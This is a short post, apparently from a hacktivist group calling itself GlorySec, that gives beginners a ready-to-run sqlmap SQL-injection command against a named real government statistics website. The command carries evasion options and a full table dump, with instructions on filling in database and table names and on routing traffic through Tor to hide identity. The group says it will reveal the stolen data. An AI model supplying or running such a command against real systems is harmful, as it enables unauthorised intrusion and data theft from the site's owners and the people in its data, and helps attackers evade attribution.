Just get sqlmap and then run this command on whatever table you want

python sqlmap.py -u "https://www.pcbs.gov.ps/statisticsIndicatorsTables.aspx?lang=en&table_id=1481" --random-agent --tamper=space2comment --threads=10 --no-cast -D thedatabasename -T thetablename --columns --dump -o

Change -D to the actual database name and then -T to the actual table name say yes to first option and no to the other option.
I guess this tutorian is made for typical beginners

If you want to secure your identity even more you can use --tor --tor-type=SOCKS5 command (have TOR open in the background) 

You can watch tutorials on sqlmap if you don't understand, this is just small work coming from us on GlorySec since people seem to be suspicious that we aren't really doing anything we will reveal this data I guess.